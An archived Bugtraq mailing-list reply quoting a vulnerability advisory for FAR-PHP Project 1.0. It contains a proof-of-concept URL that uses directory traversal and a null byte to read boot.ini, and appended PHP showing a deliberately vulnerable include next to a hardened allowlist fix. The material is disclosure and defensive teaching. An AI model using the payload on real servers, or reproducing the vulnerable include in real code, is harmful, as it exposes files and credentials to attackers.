Message-id: <1219369613.1131.4.camel@hextic-desktop>
Date: Thu, 21 Aug 2008 21:46:53 -0400
From: William McAfee <sec-community@...goodhacker.com>
To: beenudel1986@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0

I'm sorry, but your screenshot actually leads me to not have much more
confidence.  I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way.  Provide us with a pure
script, please.  Also, on an unrelated note, why are you running
professional?  Why did you blank out the bottom half of the window?
What are you hiding?

On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@...il.com wrote:
> ################################################################
> # [ASCII-art banner, garbled in the archive and not recoverable; readable text: est.2007 forum.darkc0de.com]
> 
> ################################################################
> 
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
> 
> 
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
> 
> 
> #Python Dark Scripts: www.beenuarora.com/work.html
> 
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk: Null Byte Files Retrieval
> #Explanation: It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
> 
> 
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
> 
> ################################################################
>  ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team members.  |
> |_____________________________________________________________________________________|
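The advisory above reports the classic null-byte local file inclusion pattern: a request parameter is concatenated into an `include` path, and on PHP versions before 5.3.4 a `%00` in the value ends the C string so the appended file extension is dropped. The following is an added example written for this thread, not code from the FAR-PHP project or from either poster; it reconstructs the vulnerable shape of such code beside a hardened replacement. The page directory `pages/`, the page names, and the `.php` suffix are assumptions.

```php
<?php
// Added example, not the project's code. Assumed layout: page scripts live
// in ./pages/<name>.php and the original code appended ".php" itself.

// Vulnerable shape (hypothetical reconstruction of the bug class):
// the request value goes straight into the include path. Directory
// traversal is never checked, and on PHP < 5.3.4 a NUL byte in $c ends
// the path string so the ".php" suffix is ignored and any readable file
// on the host is included and echoed.
function render_page_vulnerable(string $c): void
{
    include $c . '.php';
}

// Hardened replacement: the request value is only ever used to select a
// name from an allowlist, never used as a path fragment.
const PAGES = ['home', 'about', 'contact'];   // assumed page names

function resolve_page(string $c): ?string
{
    // Strict allowlist match rejects NUL bytes, slashes, "..", and every
    // other path metacharacter before anything touches the filesystem.
    if (!in_array($c, PAGES, true)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . $c . '.php');
    // Defence in depth: the resolved file must still sit inside pages/.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(string $c): void
{
    $path = resolve_page($c);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Constructed inputs, mirroring the advisory's request shape:
//   resolve_page('about')                               -> .../pages/about.php
//   resolve_page("/../../../../../../../../boot.ini\0") -> null (not in allowlist)
//   resolve_page('../index')                            -> null (not in allowlist)
```

The allowlist is the real control; the `realpath` prefix check only guards against a future edit that reintroduces user input into the path. Upgrading past PHP 5.3.4, where filesystem functions refuse paths containing NUL bytes, removes the truncation trick but not the traversal, so the allowlist is still required.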
